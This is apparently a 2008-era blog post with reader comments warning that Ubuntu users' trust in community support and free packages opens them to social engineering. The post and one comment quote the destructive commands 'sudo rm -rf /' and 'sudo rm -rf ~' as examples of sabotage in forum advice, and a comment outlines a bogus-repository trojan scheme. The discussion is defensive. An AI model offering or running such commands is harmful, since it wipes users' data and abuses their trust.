Why Ubuntu and Too Much Trust Can Be Bad
One of desktop Linux’s chief selling points is its near-immunity to malware. Whether this superiority is due to the Unix security measures that Windows lacks, or to the mere fact that comparatively few people use Linux on desktop computers, it makes Linux attractive in an era when all manner of nasty things can be done to computer users by exploiting bugs in the software they run.While Linux may not suffer from the software vulnerabilities of Windows, however, its users are still threatened by attacks that employ social-engineering—that is, those that dupe users into compromising their systems by running code or installing software without understanding the consequences.
Indeed, on a platform like Ubuntu, where the relationship between users and developers is defined by trust and presumed goodwill rather than financial exchange and a corporate EULA, the opportunities for social engineering are perhaps more abundant than they are under proprietary systems.
The cons of community support
When users have trouble with Ubuntu, the vast majority turn to community-based resources like the Ubuntu forums or documentation wiki. In many cases, at least in my experience, this method is a lot more effective and rewarding than making a call to an outsourced technical-support center and being put on hold indefinitely.
At the same time, malicious individuals thrive in community-based support channels. Even in those that are well policed, like the Ubuntu forums, novice users run the risk of being told to install bad software or run commands like sudo rm -rf /
‘Open-source’ doesn’t always mean ‘plays nicely’
The fact that almost all software on Ubuntu is free presents another opportunity for social-engineering attacks.
On Windows, I’m always cautious about installing free applications, because I know that in the Windows world, developers generally work for money. If they don’t make money by selling their software, they probably do it some other, potentially destructive way. I thus think twice before running an installer that I downloaded for free, and for which no source code is available.
Most of the software that I use on Ubuntu, in contrast, is developed by people working for free, who share their work in the hope that it will benefit others, not to make money. I’m consequently much more relaxed about installing software on Ubuntu, even if it’s in a third-party repository. Because trust is central to the model upon which Ubuntu is developed, I subconsciously assume the best about the intentions of people who develop applications for Linux.
I’ve yet to have my Ubuntu system compromised through this trust. But the assumptions of goodwill that Ubuntu encourages among its users present opportunities for exploitation that don’t exist in the proprietary world.
Even if software is open-source, I’m hardly qualified to check the code myself to ensure that it’s not malicious. There’s also no guarantee that pre-compiled .deb packages are built from the benign code that they purport.
Attacks like these are perhaps most troubling because they require few technical skills on the part of malicious individuals. No one needs to know how to exploit a buffer overflow and execute arbitrary code; they just need to convince an Ubuntu user with her guard down that she should run a Debian package that does more than advertised.
This isn’t to say that Ubuntu users should trust each other any less. But we should be aware of the risks that come with openness and freedom, in order to prevent a malevolent few from exploiting the trust upon which the Ubuntu community is founded.
For the time being, Ubuntu and Linux are still safer by far than Windows and even OS X. But as the market share of desktop Linux increases, attackers may well find that the assumptions of beneficence inherent to the free-software world open up opportunities for social engineering on a scale unprecedented under proprietary platforms.
WorksWithU Contributing Blogger Christopher Tozzi is a PhD student at a major U.S. university. Tozzi has extensive hands-on experience with Ubuntu Server Edition and Ubuntu Desktop Edition. WorksWithU is updated multiple times per week. Don’t miss a single post. Sign up for our RSS and Twitter feeds (available now) and newsletter (launching January 2009).
I don’t think Linux users should worry about more than other OS users.
Stupid users are OS indipendent 😉
Quote:
On Windows, I’m always cautious about installing free applications, because I know that in the Windows world, developers generally work for money. If they don’t make money by selling their software, they probably do it some other, potentially destructive way. I thus think twice before running an installer that I downloaded for free, and for which no source code is available.
End Quote
You are the first Windows user I’ve encountered that acts and thinks in this way 😀
Generally Windows users have the tendency to install everything they find on the internet without checking what they are installing…think about cracks of software and games…Oh, and I don’t think Win free software developers are so that evil and money obsessed 😀
Never when installing free software on Windows have I ever been so paranoid about a single piece of software or thought to my self “oh this Windows software strangely free, I better be careful”. Unsurprisingly I’ve never thought like that when installing software on Ubuntu either.
What I have thought about is the source of that software. Where did it come from? Which company is behind it? Who’s backing it? Have I heard of it before? Asking these questions helps me determine it’s trustworthyness. Not the price tag.
Social engineering is more of a problem on the web rather than a specific OS or platform. It’s something that technology can’t really protect us from. It’s something that we as users must be aware of and try to avoid. As the old saying goes “if it’s too good to be true, it probably is”.
So don’t open e-mails from Nigerian business men trying to shift their lottery winnings out of the country. And if you win any competitions you should never need to stump up a fee to collect your prize. Your bank will also never ever ask for your full account or even partial details via e-mail.
First off your headline is misleading. It should read Linux. Ubuntu is not the same as Linux and vice versa. The things that you write about would apply to any distro.
Secondly, it is a crock. Unlike in the Windows world, repositories are maintained. Package maintainers are carefully screened and they must be invited to do the job. It is quite a privilege, as it is an exclusive group.
Thirdly, the behaviour that you are fearful of is strictly Windows behaviour and does not apply to Linux users. Most Linux users do not install DEBs or RPMs willy nilly from the internet. Most users, rely on only the repositories and sites such as GETDEB.net which again are maintained. Any linux user who deviates from this practice is more likely to break their package manager than invite disaster from malware and other Windows problems.
This column underscores the difference between Linux users and also shows the danger in trying to apply the habits of one group of user to another. Your argument is based on the false premise that Linux users have Windows habits. They don’t.
I’m a system admin. I mainly work on MS servers/workstations. I can tell you from the stuff that I have to clean off of computers all of the time, that the users that don’t read in Windows, are not going to read in Linux.
These users will not switch to Linux because it is not point and click so much. Still a lot of the fixes are CLI driven. This will keep most dumb users away form Linux any way.
In life there are 3 types of people. Those that drive a manual. Those that drive an automatic. Those that drive an automatic, but know how to drive a manual but are lazy. Of these 3, only 2 would be considered good computer users. The 1, no matter what system they are on, they will be stupid and not really know how anything works, because they enjoy the bliss to much.
LinuxCanuck: At the moment, MOST switchers are if not full nerds, semi-nerds so they understand how viruses work and are usually the people that won’t install Bear Share on their Windows PC. But when little Johnny gets his Dell Mini on Christmas or I wipe my cousins computer and put Ubuntu on it (with my own OEM version ;)) and she gets an Instant Message from a friend that says “to view this Smiley you need smileycenteral”, she WILL click that link. If there is an easily installable .deb to download and run, there WILL be problems. Ubuntu/linux in general is ALOT more powerful than Windows and the damage that can be done not only to your machine but also other machines on your network, etc. is a BIG issue.
Another example is if you are just learning how to mess with your machine and want to fix things on your own. You will hit up the forums or google, the site you come upon could be some a*hole that included in his step by step instructions on lets say point #7 in the middle of the tutorial puts something like . #7. In the terminal type “sudo rm -rf /” or “sudo rm -rf ~” just to be a prick. Just because right now its not happening (as often) does not mean when Linux has 80% market share, it won’t. There will be a lot more reasons to do it, and a lot more idiots (or regular Joes) to try it out. The biggest cure is to not let my cousin administer her own system and tell her to call me when she needs a new app or something, ssh into her machine from home or the G1 and “sudo apt-get install”.
I agree with Mouseclone.
Why has no Linux hater ever written a Linux virus, just to proof that we, Linux adepts, have no reason to feel safe? Because it is impossible, of course…
Linux viruses do exist. There’s just no where near as many of them as there are Windows viruses. While anti-virus software for Linux also exists the Linux approach to virus protection is very different for the Microsoft approach.
In the Linux world we try to prevent infection rather than simply cure it. Security to Linux is an integral part of the development strategy. Not a bolt on extra.
@LinuxCanuck: Repositories are indeed maintained. So well maintained the Debian project recently accidentally introduced a critical flaw to some code vital for security. Even if people don’t have any malicious intent we need to know they can be trusted before we sign up to their repo.
We also have to remember anybody can create a repository. All people with malicious intent need to do is setup a bogus FOSS project and start getting people to add the repo to their sources list for automatic updates. Once you have a decent user base you introduce the rouge code and trigger it before anybody notices it’s there.
Many Linux users would be caught with their pants down with such a scheme. It’s not difficult to con your way past peoples defences. The social engineering Christopher Tozzi talks about used to be known as blagging.
“I’ve yet to have my Ubuntu system compromised through this trust. But the assumptions of goodwill that Ubuntu encourages among its users present opportunities for exploitation that don’t exist in the proprietary world.”
Oh yes it does, its just less justifiable. It is that casual trust that has made propagation so much easier. Perhaps it could be better explained as unknowing, or unbelieving, but it is ultimately trust.
Otherwise, good job. Since I usually end any discussion of malware avoidance with noting that the best avoidance to be had–short of unplugging–is an OS OS like Ubuntu, I always tell prospective users that staying within the main repositories is the best way to avoid issues. And that should be the mantra whenever one promotes any Linux distro to the uninitiated as a more secure OS.
Personally I’d suggest simply educating people about these issues is the best way to deal with it. Mollycoddling and wrapping people in the cotton wool of Windows with anti-virus, anti-spyware, anti-trojan, anti-user (Windows Vista UAC) has actually encouraged ignorance of on-line dangers to perpetuate.
Encouraging people to educate themselves about these issues is a no brainer. I’m betting everybody posting here is pretty much self educated about these issues.
At some point someone exposed you to the concept of security in IT environments and you decided to find out more. People should be encouraged to tackle security head on and not avoid it.
If we all lived in bubbles we’d never develop healthy immune systems to protect us. Unfortunately bubbles tend to burst. Risk is all a part of the game. People need to learn how to weigh up the risks. That way we all benefit. Linux users, Windows users, Mac users and UNIX users. We’re all in it together.